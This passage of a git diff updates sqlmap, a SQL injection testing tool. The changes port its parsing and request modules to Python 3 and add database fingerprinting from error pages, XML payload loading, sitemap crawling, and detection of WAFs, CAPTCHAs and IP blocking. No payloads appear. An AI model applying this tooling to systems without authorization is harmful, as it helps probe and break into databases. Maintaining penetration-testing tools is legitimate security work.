lib.parse.handler import FingerprintHandler - def headersParser(headers): """ This function calls a class that parses the input HTTP headers to @@ -24,21 +21,16 @@ def headersParser(headers): if not kb.headerPaths: kb.headerPaths = { - "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), - "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), - "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"), - "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), - "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), - "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), + "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), + "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), + "set-cookie": 
os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), + "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), + "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } - for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): - value = headers[header] - xmlfile = kb.headerPaths[header] - checkFile(xmlfile) - - handler = FingerprintHandler(value, kb.headersFp) - - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) + for header, xmlfile in kb.headerPaths.items(): + if header in headers: + handler = FingerprintHandler(headers[header], kb.headersFp) + parseXmlFile(xmlfile, handler) + parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/html.py b/lib/parse/html.py index 367276ba5e2..38001235485 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -1,18 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler -from lib.core.common import checkFile +from lib.core.common import urldecode from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD from lib.core.threads import getCurrentThreadData class HTMLHandler(ContentHandler): @@ -25,7 +26,12 @@ def __init__(self, page): ContentHandler.__init__(self) self._dbms = None - self._page = page + self._page = (page or "") + try: + self._lower_page = self._page.lower() + except SystemError: # https://bugs.python.org/issue18183 + self._lower_page = None + self._urldecoded_page = urldecode(self._page) self.dbms = None @@ -34,23 +40,51 @@ def _markAsErrorPage(self): threadData.lastErrorPage = (threadData.lastRequestUID, self._page) def startElement(self, name, attrs): + if self.dbms: + return + if name == "dbms": self._dbms = attrs.get("value") elif name == "error": - if re.search(attrs.get("regexp"), self._page, re.I): + regexp = attrs.get("regexp") + if regexp not in kb.cache.regex: + keywords = re.findall(r"\w+", re.sub(r"\\.", " ", regexp)) + keywords = sorted(keywords, key=len) + kb.cache.regex[regexp] = keywords[-1].lower() + + if ('|' in regexp or kb.cache.regex[regexp] in (self._lower_page or kb.cache.regex[regexp])) and re.search(regexp, self._urldecoded_page, re.I): self.dbms = self._dbms self._markAsErrorPage() + kb.forkNote = kb.forkNote or attrs.get("fork") def htmlParser(page): """ This function calls a class that parses the input HTML page to fingerprint the back-end database management system + + >>> from lib.core.enums import DBMS + >>> htmlParser("Warning: mysql_fetch_array() expects parameter 1 to be resource") == DBMS.MYSQL + True + >>> threadData = getCurrentThreadData() + >>> threadData.lastErrorPage = None """ + page = page[:HEURISTIC_PAGE_SIZE_THRESHOLD] + xmlfile = paths.ERRORS_XML - checkFile(xmlfile) handler = HTMLHandler(page) + key = hash(page) + + # generic SQL warning/error messages + if re.search(r"SQL (warning|error|syntax)", page, re.I): + handler._markAsErrorPage() + + if key in kb.cache.parsedDbms: + retVal = kb.cache.parsedDbms[key] + if retVal: + handler._markAsErrorPage() + return retVal parseXmlFile(xmlfile, handler) @@ -60,8 +94,6 @@ def htmlParser(page): else: kb.lastParserStatus = None - # generic SQL warning/error messages - if 
re.search(r"SQL (warning|error|syntax)", page, re.I): - handler._markAsErrorPage() + kb.cache.parsedDbms[key] = handler.dbms return handler.dbms diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index fe2befb0533..24ee83e1a6d 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -1,28 +1,38 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os +import re + from xml.etree import ElementTree as et +from lib.core.common import getSafeExString +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import paths from lib.core.datatype import AttribDict +from lib.core.exception import SqlmapInstallationException +from lib.core.settings import PAYLOAD_XML_FILES def cleanupVals(text, tag): + if tag == "clause" and '-' in text: + text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text) + if tag in ("clause", "where"): text = text.split(',') - if isinstance(text, basestring): - text = int(text) if text.isdigit() else str(text) + if hasattr(text, "isdigit") and text.isdigit(): + text = int(text) elif isinstance(text, list): count = 0 for _ in text: - text[count] = int(_) if _.isdigit() else str(_) + text[count] = int(_) if _.isdigit() else _ count += 1 if len(text) == 1 and tag not in ("clause", "where"): @@ -31,10 +41,10 @@ def cleanupVals(text, tag): return text def parseXmlNode(node): - for element in node.getiterator('boundary'): + for element in node.findall("boundary"): boundary = AttribDict() - for child in element.getchildren(): + for child in element.findall("*"): if child.text: values = cleanupVals(child.text, child.tag) boundary[child.tag] = values @@ -43,21 +53,22 @@ def parseXmlNode(node): conf.boundaries.append(boundary) - for element in node.getiterator('test'): + for element in node.findall("test"): test = AttribDict() - for child in element.getchildren(): + for child in element.findall("*"): if child.text and child.text.strip(): values = cleanupVals(child.text, child.tag) test[child.tag] = values else: - if len(child.getchildren()) == 0: + progeny = child.findall("*") + if len(progeny) == 0: test[child.tag] = None continue else: test[child.tag] = AttribDict() - for gchild in child.getchildren(): + for gchild in progeny: if gchild.tag in test[child.tag]: prevtext = test[child.tag][gchild.tag] test[child.tag][gchild.tag] = [prevtext, gchild.text] @@ -66,7 +77,47 @@ def parseXmlNode(node): conf.tests.append(test) -def loadPayloads(): - doc = et.parse(paths.PAYLOADS_XML) +def loadBoundaries(): + """ + Loads boundaries from XML + + >>> conf.boundaries = [] + >>> loadBoundaries() + >>> len(conf.boundaries) > 0 + True + """ + + try: + doc = et.parse(paths.BOUNDARIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + root = doc.getroot() parseXmlNode(root) + +def loadPayloads(): + """ + Loads payloads/tests from XML + + >>> conf.tests = [] + >>> loadPayloads() + >>> len(conf.tests) > 0 + True + """ + + for payloadFile in PAYLOAD_XML_FILES: + payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile) + + try: + doc = et.parse(payloadFilePath) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + + root = doc.getroot() + parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py new file mode 100644 index 00000000000..6081d1088c5 --- /dev/null +++ b/lib/parse/sitemap.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import readInput +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.exception import SqlmapSyntaxException +from lib.request.connect import Connect as Request +from thirdparty.six.moves import http_client as _http_client + +abortedFlag = None + +def parseSitemap(url, retVal=None): + global abortedFlag + + if retVal is not None: + logger.debug("parsing sitemap '%s'" % url) + + try: + if retVal is None: + abortedFlag = False + retVal = OrderedSet() + + try: + content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" + except _http_client.InvalidURL: + errMsg = "invalid URL given for sitemap ('%s')" % url + raise SqlmapSyntaxException(errMsg) + + for match in re.finditer(r"\s*([^<]+)", content or ""): + if abortedFlag: + break + url = match.group(1).strip() + if url.endswith(".xml") and "sitemap" in url.lower(): + if kb.followSitemapRecursion is None: + message = "sitemap recursion detected. Do you want to follow? [y/N] " + kb.followSitemapRecursion = readInput(message, default='N', boolean=True) + if kb.followSitemapRecursion: + parseSitemap(url, retVal) + else: + retVal.add(url) + + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during sitemap parsing. 
sqlmap " + warnMsg += "will use partial list" + logger.warning(warnMsg) + + return retVal diff --git a/lib/request/__init__.py b/lib/request/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/request/__init__.py +++ b/lib/request/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/request/basic.py b/lib/request/basic.py index e9130fe7b27..758f993ca61 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -1,44 +1,67 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import codecs import gzip +import io import logging import re -import StringIO -import struct import zlib +from lib.core.common import Backend from lib.core.common import extractErrorMessage from lib.core.common import extractRegexResult -from lib.core.common import getUnicode +from lib.core.common import filterNone +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import isListLike +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage +from lib.core.common import unArrayizeValue +from lib.core.convert import decodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger -from lib.core.enums import HTTPHEADER +from lib.core.decorators import cachedmethod +from lib.core.decorators import lockedmethod +from lib.core.dicts import HTML_ENTITIES +from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PLACE from lib.core.exception import SqlmapCompressionException -from lib.core.htmlentities import htmlEntities +from lib.core.settings import BLOCKED_IP_REGEX from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import EVENTVALIDATION_REGEX +from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD +from lib.core.settings import IDENTYWAF_PARSE_LIMIT from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import ML from lib.core.settings import META_CHARSET_REGEX from lib.core.settings import PARSE_HEADERS_LIMIT +from lib.core.settings import PRINTABLE_BYTES +from lib.core.settings import SELECT_FROM_TABLE_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VIEWSTATE_REGEX from lib.parse.headers import headersParser from lib.parse.html import htmlParser +from thirdparty import six from thirdparty.chardet import detect +from thirdparty.identywaf import identYwaf +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client -def forgeHeaders(items=None): +@lockedmethod +def forgeHeaders(items=None, base=None): """ Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing the HTTP requests @@ -46,51 +69,78 @@ def forgeHeaders(items=None): items = 
items or {} - for _ in items.keys(): + for _ in list(items.keys()): if items[_] is None: del items[_] - headers = dict(conf.httpHeaders) - headers.update(items or {}) + headers = OrderedDict(conf.httpHeaders if base is None else base) + headers.update(items.items()) - headers = dict(("-".join(_.capitalize() for _ in key.split('-')), value) for (key, value) in headers.items()) + class _str(str): + def capitalize(self): + return _str(self) + + def title(self): + return _str(self) + + _ = headers + headers = OrderedDict() + for key, value in _.items(): + success = False + + for _ in headers: + if _.upper() == key.upper(): + del headers[_] + break + + if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): + try: + headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 + except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) + pass + else: + success = True + if not success: + key = '-'.join(_.capitalize() for _ in key.split('-')) + headers[key] = value if conf.cj: - if HTTPHEADER.COOKIE in headers: + if HTTP_HEADER.COOKIE in headers: for cookie in conf.cj: - if ("%s=" % cookie.name) in headers[HTTPHEADER.COOKIE]: - if kb.mergeCookies is None: - message = "you provided a HTTP %s header value. " % HTTPHEADER.COOKIE - message += "The target url provided its own cookies within " - message += "the HTTP %s header which intersect with yours. " % HTTPHEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? [Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") - - if kb.mergeCookies: - _ = lambda x: re.sub("(?i)%s=[^%s]+" % (cookie.name, DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, cookie.value), x) - headers[HTTPHEADER.COOKIE] = _(headers[HTTPHEADER.COOKIE]) + if cookie is None or cookie.domain_specified and not (conf.hostname or "").endswith(cookie.domain): + continue + + if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]): + if conf.loadCookies: + conf.httpHeaders = filterNone((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders) + elif kb.mergeCookies is None: + message = "you provided a HTTP %s header value, while " % HTTP_HEADER.COOKIE + message += "target URL provides its own cookies within " + message += "HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE + message += "Do you want to merge them in further requests? 
[Y/n] " + + kb.mergeCookies = readInput(message, default='Y', boolean=True) + + if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: + def _(value): + return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value) + + headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) - conf.httpHeaders = [(item[0], item[1] if item[0] != HTTPHEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] + conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] elif not kb.testMode: - headers[HTTPHEADER.COOKIE] += "%s %s=%s" % (DEFAULT_COOKIE_DELIMITER, cookie.name, cookie.value) + headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value)) - if kb.testMode: + if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): resetCookieJar(conf.cj) - if kb.redirectSetCookie and not conf.dropSetCookie: - if HTTPHEADER.COOKIE in headers: - headers[HTTPHEADER.COOKIE] += "%s %s" % (DEFAULT_COOKIE_DELIMITER, kb.redirectSetCookie) - else: - headers[HTTPHEADER.COOKIE] = kb.redirectSetCookie - return headers -def parseResponse(page, headers): +def parseResponse(page, headers, status=None): """ @param page: the page to parse to feed the knowledge base htmlFp (back-end DBMS fingerprint based upon DBMS error messages return @@ -102,34 +152,57 @@ def parseResponse(page, headers): headersParser(headers) if page: - htmlParser(page) + htmlParser(page if not status else "%s\n\n%s" % (status, page)) +@cachedmethod def checkCharEncoding(encoding, warn=True): + """ + Checks encoding name, repairs common misspellings and adjusts to + proper namings used in codecs module + + >>> checkCharEncoding('iso-8858', False) + 'iso8859-1' + >>> checkCharEncoding('en_us', False) + 'utf8' + """ + + if isinstance(encoding, six.binary_type): + encoding = getUnicode(encoding) + + if isListLike(encoding): + encoding = unArrayizeValue(encoding) + if encoding: encoding = encoding.lower() else: return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() + encoding = encoding.replace(""", "") + # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 + elif "8895" in encoding: + encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 elif "2313" in encoding: encoding = 
encoding.replace("2313", "2312") # gb2313 -> gb2312 - elif "x-euc" in encoding: - encoding = encoding.replace("x-euc", "euc") # x-euc-kr -> euc-kr + elif encoding.startswith("x-"): + encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish + elif "windows-cp" in encoding: + encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 # name adjustment for compatibility if encoding.startswith("8859"): @@ -148,122 +221,194 @@ def checkCharEncoding(encoding, warn=True): encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" + elif encoding.find("utf-8") > 0: + encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*"): + elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: codecs.lookup(encoding) - except LookupError: - if warn: - warnMsg = "unknown web page charset '%s'. " % encoding - warnMsg += "Please report by e-mail to %s." % ML - singleTimeLogMessage(warnMsg, logging.WARN, encoding) + except: encoding = None + if encoding: + try: + six.text_type(getBytes(randomStr()), encoding) + except: + if warn: + warnMsg = "invalid web page charset '%s'" % encoding + singleTimeLogMessage(warnMsg, logging.WARN, encoding) + encoding = None + return encoding +@lockedmethod def getHeuristicCharEncoding(page): """ Returns page encoding charset detected by usage of heuristics - Reference: http://chardet.feedparser.org/docs/ + + Reference: https://chardet.readthedocs.io/en/latest/usage.html + + >>> getHeuristicCharEncoding(b"") + 'ascii' """ - retVal = detect(page)["encoding"] - infoMsg = "heuristics detected web page charset '%s'" % retVal - singleTimeLogMessage(infoMsg, logging.INFO, retVal) + key = (len(page), hash(page)) + + retVal = kb.cache.encoding.get(key) + if retVal is None: + retVal = detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])["encoding"] + kb.cache.encoding[key] = retVal + + if retVal and retVal.lower().replace('-', "") == UNICODE_ENCODING.lower().replace('-', ""): + infoMsg = "heuristics detected web page charset '%s'" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, retVal) return retVal -def decodePage(page, contentEncoding, contentType): +def decodePage(page, contentEncoding, contentType, percentDecode=True): """ Decode compressed/charset HTTP response + + >>> getText(decodePage(b"foo&bar", None, "text/html; charset=utf-8")) + 'foo&bar' + >>> getText(decodePage(b" ", None, "text/html; charset=utf-8")) + '\\t' """ if not page or (conf.nullConnection and len(page) < 2): return getUnicode(page) - if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"): + contentEncoding = getText(contentEncoding).lower() if contentEncoding else "" + contentType = getText(contentType).lower() if contentType else "" + + if contentEncoding in ("gzip", "x-gzip", "deflate"): if not kb.pageCompress: return None try: - if contentEncoding.lower() == "deflate": - data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations + if contentEncoding == "deflate": + obj = zlib.decompressobj(-15) + page = obj.decompress(page, MAX_CONNECTION_TOTAL_SIZE + 1) + page += obj.flush() + if len(page) > MAX_CONNECTION_TOTAL_SIZE: + raise 
Exception("size too large") else: - data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page)) - size = struct.unpack(" MAX_CONNECTION_TOTAL_SIZE: + data = gzip.GzipFile("", "rb", 9, io.BytesIO(page)) + page = data.read(MAX_CONNECTION_TOTAL_SIZE + 1) + if len(page) > MAX_CONNECTION_TOTAL_SIZE: raise Exception("size too large") + except Exception as ex: + if b" 255 else _.group(0), page) + if isinstance(page, six.binary_type) and "text/" in contentType: + if not kb.disableHtmlDecoding: + # e.g. Ãëàâà + if b"&#" in page: + page = re.sub(b"&#x([0-9a-f]{1,2});", lambda _: decodeHex(_.group(1) if len(_.group(1)) == 2 else b"0%s" % _.group(1)), page) + page = re.sub(b"&#(\\d{1,3});", lambda _: six.int2byte(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page) + + # e.g. %20%28%29 + if percentDecode: + if b"%" in page: + page = re.sub(b"%([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), page) + page = re.sub(b"%([0-9A-F]{2})", lambda _: decodeHex(_.group(1)), page) # Note: %DeepSee_SQL in CACHE + + # e.g. & + page = re.sub(b"&([^;]+);", lambda _: six.int2byte(HTML_ENTITIES[getText(_.group(1))]) if HTML_ENTITIES.get(getText(_.group(1)), 256) < 256 else _.group(0), page) + + kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) + + if (kb.pageEncoding or "").lower() == "utf-8-sig": + kb.pageEncoding = "utf-8" + if page and page.startswith(b"\xef\xbb\xbf"): # Reference: https://docs.python.org/2/library/codecs.html (Note: noticed problems when "utf-8-sig" is left to Python for handling) + page = page[3:] + + page = getUnicode(page, kb.pageEncoding) + + # e.g. ’…™ + if "&#" in page: + def _(match): + retVal = match.group(0) + try: + retVal = _unichr(int(match.group(1))) + except (ValueError, OverflowError): + pass + return retVal + page = re.sub(r"&#(\d+);", _, page) + + # e.g. 
ζ + page = re.sub(r"&([^;]+);", lambda _: _unichr(HTML_ENTITIES[_.group(1)]) if HTML_ENTITIES.get(_.group(1), 0) > 255 else _.group(0), page) + else: + page = getUnicode(page, kb.pageEncoding) return page -def processResponse(page, responseHeaders): +def processResponse(page, responseHeaders, code=None, status=None): kb.processResponseCounter += 1 + page = page or "" - if not kb.dumpTable: - parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None) + parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status) + + if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,): + kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page) + else: + kb.tableFrom = None if conf.parseErrors: msg = extractErrorMessage(page) if msg: - logger.info("parsed error message: '%s'" % msg) + logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.')) + + if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT: + rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD]) + + with kb.locks.identYwaf: + identYwaf.non_blind.clear() + try: + if identYwaf.non_blind_check(rawResponse, silent=True): + for waf in set(identYwaf.non_blind): + if waf not in kb.identifiedWafs: + kb.identifiedWafs.add(waf) + errMsg = "WAF/IPS identified as '%s'" % identYwaf.format_name(waf) + singleTimeLogMessage(errMsg, logging.CRITICAL) + except Exception as ex: + singleTimeWarnMessage("internal error occurred in WAF/IPS detection ('%s')" % getSafeExString(ex)) if kb.originalPage is None: for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): @@ -273,5 +418,37 @@ def processResponse(page, responseHeaders): if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: if conf.paramDict[PLACE.POST][name] in page: continue - conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST]) + else: + msg = "do you want to automatically adjust the value of '%s'? 
[y/N]" % name + + if not readInput(msg, default='N', boolean=True): + continue + + conf.paramDict[PLACE.POST][name] = value + conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST]) + + if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): + kb.browserVerification = True + warnMsg = "potential browser verification protection mechanism detected" + if re.search(r"(?i)CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""): + for match in re.finditer(r"(?si)", page): + if re.search(r"(?i)captcha", match.group(0)): + kb.captchaDetected = True + break + + if re.search(r"]+\brefresh\b[^>]+\bcaptcha\b", page): + kb.captchaDetected = True + + if kb.captchaDetected: + warnMsg = "potential CAPTCHA protection mechanism detected" + if re.search(r"(?i)[^<]*CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if re.search(BLOCKED_IP_REGEX, page): + warnMsg = "it appears that you have been blocked by the target server" + singleTimeWarnMessage(warnMsg) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 0631debad0b..878e5a8a54b 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,19 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 +from thirdparty.six.moves import urllib as _urllib -class SmartHTTPBasicAuthHandler(urllib2.HTTPBasicAuthHandler): +class SmartHTTPBasicAuthHandler(_urllib.request.HTTPBasicAuthHandler): """ Reference: http://selenic.com/hg/rev/6c51a5056020 Fix for a: http://bugs.python.org/issue8797 """ + def __init__(self, *args, **kwargs): - urllib2.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) + _urllib.request.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) self.retried_req = set() self.retried_count = 0 @@ -30,10 +31,8 @@ def http_error_auth_reqed(self, auth_header, host, req, headers): self.retried_count = 0 else: if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) + raise _urllib.error.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) else: self.retried_count += 1 - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) + return _urllib.request.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers) diff --git a/lib/request/certhandler.py b/lib/request/certhandler.py deleted file mode 100644 index 9723990e280..00000000000 --- a/lib/request/certhandler.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import urllib2 -import sys - -from lib.core.data import conf - -class HTTPSCertAuthHandler(urllib2.HTTPSHandler): - def __init__(self, key_file, cert_file): - urllib2.HTTPSHandler.__init__(self) - self.key_file = key_file - self.cert_file = cert_file - - def https_open(self, req): - return self.do_open(self.getConnection, req) - - def getConnection(self, host): - if sys.version_info >= (2, 6): - retVal = httplib.HTTPSConnection(host, 
key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout) - else: - retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file) - return retVal diff --git a/lib/request/chunkedhandler.py b/lib/request/chunkedhandler.py new file mode 100644 index 00000000000..573f3b3d032 --- /dev/null +++ b/lib/request/chunkedhandler.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import conf +from lib.core.enums import HTTP_HEADER +from thirdparty.six.moves import urllib as _urllib + +class ChunkedHandler(_urllib.request.HTTPHandler): + """ + Ensures that HTTPHandler is working properly in case of Chunked Transfer-Encoding + """ + + def _http_request(self, request): + host = request.get_host() if hasattr(request, "get_host") else request.host + if not host: + raise _urllib.error.URLError("no host given") + + if request.data is not None: # POST + data = request.data + if not request.has_header(HTTP_HEADER.CONTENT_TYPE): + request.add_unredirected_header(HTTP_HEADER.CONTENT_TYPE, "application/x-www-form-urlencoded") + if not request.has_header(HTTP_HEADER.CONTENT_LENGTH) and not conf.chunked: + request.add_unredirected_header(HTTP_HEADER.CONTENT_LENGTH, "%d" % len(data)) + + sel_host = host + if request.has_proxy(): + sel_host = 